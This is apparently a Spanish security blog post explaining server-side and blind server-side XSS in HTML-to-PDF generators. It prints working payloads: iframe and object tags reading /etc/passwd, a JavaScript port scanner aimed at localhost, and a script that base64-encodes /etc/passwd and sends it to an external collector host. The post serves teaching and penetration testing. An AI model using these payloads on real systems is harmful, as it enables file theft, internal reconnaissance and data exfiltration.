Muy buenas a todos,
Hoy quería explicar como funciona y como podríamos explotar una vulnerabilidad que me he encontrado hace poco y que me ha parecido interesante para hacer un Post.
La vulnerabilidad (como dice el título) es Blind Server Side XSS, pero antes de meternos a ciegas, voy a explicar en que consiste la vulnerabilidad Server Side XSS.
Server Side XSS
Esta vulnerabilidad se da, cuando el servidor coge una entrada de un usuario y parsea el HTML de alguna forma, yo lo he visto en dos casos diferentes:
- Cuando un input introducido por el usuario aparece más tarde dentro de un PDF.
- Cuando el servidor quiere saber si en el input introducido se está ejecutando código JavaScript (Como medida de evasión para evitar XSS).
El segundo caso sería Blind como quería contar en este Post, pero antes de esto voy a mostrar un ejemplo del primer caso para que se entienda el concepto.
Imaginemos un caso en el que un PDF se nos genera dinamicamente, ya sea para ofrecernos un contrato o por cualquier otro motivo, y en este PDF que se esta generando contiene información que nosotros le hayamos indicado en algún momento.
Es posible, dependiendo de cada caso, que el generador que se este utilizando para obtener el PDF acepte HTML y lo interprete dependiendo de cada caso, por lo que nosotros podríamos utilizar cualquier etiqueta que nos apetezca.
Como prueba de concepto he configurado un generador de PDFs que acepta HTML y he inyectado un tag "<h2>".
Como podemos ver estamos siendo capaces de introducir Tags, ¿y que podemos hacer con esto?
Lo que vayamos a poder hacer depende mucho del parser, pero a mi se me ocurren las siguientes opciones que deberíamos de probar y que pudieran funcionar:
- En el mejor de los casos en el que no nos filtrase nada podríamos intentar leer ficheros, podríamos hacerlo de las siguientes formas.
<iframe src="file:///etc/passwd"></iframe>
<object data="file:///etc/passwd">
(El parser que utilizaba no es vulnerable a este tipo de ataque por lo que la imagen es de internet).
- En el caso de que no permitiera acceder a ficheros del sistema, podríamos intentar acceder a servicios internos a los que no tendríamos acceso en un primer momento. Para esto podríamos usar las mismas técnicas que hemos utilizado en el punto anterior.
De esta forma, pudiendo acceder a servicios internos, podríamos con JavaScript realizar un escaneo interno de puertos para más tarde interactuar con ellos.
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
document.write(port + " ");
});
}
for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src=x onerror="checkPort()">
- También existe el caso en el que el parser tuviera en cuenta las Cors (más información sobre las Cors), en este caso tan solo podríamos realizar peticiones al servicio Web desde el que se está ejecutando el Parser, por lo que no podríamos trastear bien con otros servicios o equipos de la red interna, sin embargo al estar realizando las peticiones desde localhost podríamos utilizarlo para evitar otros filtros de seguridad:
- Conseguir Directory Listing en directorios donde en un principio no tendríamos.
- Evadir medidas de protección Anti-BruteForce.
- Acceder a sitios en los que en principio no podíamos, como paneles de administración u otros similares.
Blind Server Side XSS
Una vez que sepamos que el servidor es vulnerable a Blind Server Side XSS la posible explotación es la misma, la única diferencia es que al no ver el contenido tras el parseo de nuestro script, deberemos encodearlo en Base64 (para no perder parte del contenido) y enviárnoslo a nuestro servidor malicioso.
<script>
x=new XMLHttpRequest;
y=new XMLHttpRequest;
x.onload=function(){y.open("GET","http://burpCollaboratorPayload.net/?test="+btoa(this.responseText));y.send()};
x.open("GET","file:///etc/passwd");x.send();
</script>
De esta forma ya podríamos explotar la vulnerabilidad y tendríamos las mismas posibilidades que si esta no fuera Blind.
De momento he acabado si os apetece me podéis seguir en Twitter para ver nuevos Posts y así echarme de paso una manita.
Saluti.
En beses es peor el remedio que la enfermedad.